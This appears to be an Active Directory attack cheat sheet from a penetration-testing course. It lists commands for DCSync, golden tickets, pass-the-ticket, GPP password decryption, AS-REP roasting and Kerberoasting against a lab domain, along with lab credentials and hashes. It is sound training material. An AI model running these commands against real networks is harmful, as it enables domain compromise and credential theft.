python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ Uses gettgtpkinit .py to request a TGT ticket for
-pfx-base64 <base64 certificate> = dc01.ccache the Domain Controller ( dc01.ccache ) from a
Linux-based host.
secretsdump.py -just-dc-user INLANEFREIGHT/administrator -k -no-pass "ACADEMY- Impacket tool used to perform a DCSync attack
EA-DC01$"@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL and retrieve one or all of the NTLM password
hashes from the target Windows domain.
Performed from a Linux-based host.
klist krb5-user command used to view the contents of
the ccache file. Performed from a Linux-based
host.
python /opt/PKINITtools/getnthash.py -key Used to submit TGS requests
70f805f9c91ca91836b670447facb099b4b2b7cd5b762386b3369aa16d912275 using getnthash.py from a Linux-based host.
INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01$
secretsdump.py -just-dc-user INLANEFREIGHT/administrator "ACADEMY-EA- Impacket tool used to extract hashes
DC01$"@172.16.5.5 -hashes from NTDS.dit using a DCSync attack and a
aad3c435b514a4eeaad3b935b51304fe:313b6f423cd1ee07e91315b4919fb4ba captured hash ( -hashes ). Performed from a Linux-
based host.
.\Rubeus.exe asktgt /user:ACADEMY-EA-DC01$ /<base64 certificate>=/ptt Uses Rubeus to request a TGT and perform
a pass-the-ticket attack using the machine
account ( /user:ACADEMY-EA-DC01$ ) of a Windows
target. Performed from a Windows-based host.
mimikatz # lsadump::dcsync /user:inlanefreight\krbtgt Performs a DCSync attack using Mimikatz .
Performed from a Windows-based host.

Miscellaneous Misconfigurations
Command Description
Import-Module .\SecurityAssessment.ps1 Used to import the module Security Assessment.ps1 . Performed from a
Windows-based host.
Get-SpoolStatus -ComputerName ACADEMY-EA- SecurityAssessment.ps1 based tool used to enumerate a Windows target
DC01.INLANEFREIGHT.LOCAL for MS-PRN Printer bug . Performed from a Windows-based host.
adidnsdump -u inlanefreight\\forend ldap://172.16.5.5 Used to resolve all records in a DNS zone over LDAP from a Linux-based
host.
adidnsdump -u inlanefreight\\forend ldap://172.16.5.5 -r Used to resolve unknown records in a DNS zone by performing an A
query ( -r ) from a Linux-based host.
Get-DomainUser * \| Select-Object PowerView tool used to display the description field of select objects
samaccountname,description ( Select-Object ) on a target Windows domain from a Windows-based
host.
Get-DomainUser -UACFilter PASSWD_NOTREQD \| Select-Object PowerView tool used to check for the PASSWD_NOTREQD setting of select
samaccountname,useraccountcontrol objects ( Select-Object ) on a target Windows domain from a Windows-
based host.
ls \\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts Used to list the contents of a share hosted on a Windows target from the
context of a currently logged on user. Performed from a Windows-based
host.

Group Policy Enumeration & Attacks


Command Description
gpp-decrypt Tool used to decrypt a captured group policy preference password from a
VPe/o9YRyz2cksnYRbNeQj35w9KxQ5ttbvtRaAVqxaE Linux-based host.
crackmapexec smb -L \| grep gpp Locates and retrieves a group policy preference
password using CrackMapExec , the filters the output using grep . Peformed from
a Linux-based host.
crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 - Locates and retrieves any credentials stored in the SYSVOL share of a Windows
M gpp_autologin target using CrackMapExec from a Linux-based host.
Get-DomainGPO \| select displayname PowerView tool used to enumerate GPO names in a target Windows domain from
a Windows-based host.
Get-GPO -All \| Select DisplayName PowerShell cmd-let used to enumerate GPO names. Performed from a Windows-
based host.
$sid=Convert-NameToSid "Domain Users" Creates a variable called $sid that is set equal to the Convert-NameToSid tool
and specifies the group account Domain Users . Performed from a Windows-
based host.
Get-DomainGPO \| Get-ObjectAcl \| ? PowerView tool that is used to check if the Domain Users ( eq $sid ) group has
{$_.SecurityIdentifier -eq $sid any rights over one or more GPOs. Performed from a Windows-based host.
Get-GPO -Guid 7CA9C789-14CE-46E3-A722-83F4097AF532 PowerShell cmd-let used to display the name of a GPO given a GUID . Performed
from a Windows-based host.

ASREPRoasting
Command Description
Get-DomainUser -PreauthNotRequired \| select PowerView based tool used to search for
samaccountname,userprincipalname,useraccountcontrol \| fl the DONT_REQ_PREAUTH value across in user accounts in a target
Windows domain. Performed from a Windows-based host.
.\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat Uses Rubeus to perform an ASEP Roasting attack and formats
the output for Hashcat . Performed from a Windows-based host.
hashcat -m 18200 ilfreight_asrep Uses Hashcat to attempt to crack the captured hash using a
/usr/share/wordlists/rockyou.txt wordlist ( rockyou.txt ). Performed from a Linux-based host.
kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 Enumerates users in a target Windows domain and automatically
/opt/jsmith.txt retrieves the AS for any users found that don't require Kerberos pre-
authentication. Performed from a Linux-based host.

Trust Relationships - Child > Parent Trusts


Command Description
Import-Module activedirectory Used to import the Active Directory module.
Performed from a Windows-based host.
Get-ADTrust -Filter * PowerShell cmd-let used to enumerate a target
Windows domain's trust relationships. Performed
Command Description
from a Windows-based host.
Get-DomainTrust PowerView tool used to enumerate a target
Windows domain's trust relationships. Performed
from a Windows-based host.
Get-DomainTrustMapping PowerView tool used to perform a domain trust
mapping from a Windows-based host.
Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL \| select SamAccountName PowerView tools used to enumerate users in a
target child domain from a Windows-based host.
mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt Uses Mimikatz to obtain
the KRBTGT account's NT Hash from a Windows-
based host.
Get-DomainSID PowerView tool used to get the SID for a target
child domain from a Windows-based host.
Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" \| PowerView tool used to obtain the Enterprise
select distinguishedname,objectsid Admins group's SID from a Windows-based host.
ls \\academy-ea-dc01.inlanefreight.local\c$ Used to attempt to list the contents of the C drive
on a target Domain Controller. Performed from a
Windows-based host.
mimikatz # kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL Uses Mimikatz to create a Golden Ticket from
/sid:S-1-5-21-2806153819-209893948-922872689 a Windows-based host .
/krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-
2865463114-519 /ptt
.\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f Uses Rubeus to create a Golden Ticket from a
/domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948- Windows-based host.
922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt
mimikatz # lsadump::dcsync /user:INLANEFREIGHT\lab_adm Uses Mimikatz to perform a DCSync attack
from a Windows-based host.
secretsdump.py logistics.inlanefreight.local/[email protected] -just- Impacket tool used to perform a DCSync attack
dc-user LOGISTICS/krbtgt from a Linux-based host.
lookupsid.py logistics.inlanefreight.local/[email protected] Impacket tool used to perform a SID Brute
forcing attack from a Linux-based host.
lookupsid.py logistics.inlanefreight.local/[email protected] \| grep Impacket tool used to retrieve the SID of a target
"Domain SID" Windows domain from a Linux-based host.
lookupsid.py logistics.inlanefreight.local/[email protected] \| grep - Impacket tool used to retrieve the SID of a target
B12 "Enterprise Admins" Windows domain and attach it to the Enterprise
Admin group's RID from a Linux-based host.
ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain Impacket tool used to create a Golden
LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948- Ticket from a Linux-based host.
922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker
export KRB5CCNAME=hacker.ccache Used to set the KRB5CCNAME Environment
Variable from a Linux-based host.
psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea- Impacket tool used to establish a shell session
dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5 with a target Domain Controller from a Linux-
based host.
raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb- Impacket tool that automatically performs an
student_adm attack that escalates from child to parent domain.

Trust Relationships - Cross-Forest


Command Description
Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL \| PowerView tool used to enumerate accounts for associated SPNs from a
select SamAccountName Windows-based host.
Get-DomainUser -Domain FREIGHTLOGISTICS.LOCAL -Identity PowerView tool used to enumerate the mssqlsvc account from a Windows-
mssqlsvc \| select samaccountname,memberof based host.
.\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL Uses Rubeus to perform a Kerberoasting Attack against a target Windows
/user:mssqlsvc /nowrap domain ( /domain:FREIGHTLOGISTICS.local ) from a Windows-based host.
Get-DomainForeignGroupMember -Domain PowerView tool used to enumerate groups with users that do not belong to
FREIGHTLOGISTICS.LOCAL the domain from a Windows-based host.
Enter-PSSession -ComputerName ACADEMY-EA- PowerShell cmd-let used to remotely connect to a target Windows system
DC03.FREIGHTLOGISTICS.LOCAL -Credential from a Windows-based host.
INLANEFREIGHT\administrator
Command Description
GetUserSPNs.py -request -target-domain Impacket tool used to request ( -request ) the TGS ticket of an account in a
FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley target Windows domain ( -target-domain ) from a Linux-based host.
bloodhound-python -d INLANEFREIGHT.LOCAL -dc ACADEMY-EA- Runs the Python implementation of BloodHound against a target Windows
DC01 -c All -u forend -p Klmcargo2 domain from a Linux-based host.
zip -r ilfreight_bh.zip *.json Used to compress multiple files into 1 single .zip file to be uploaded into
the BloodHound GUI.

You might also like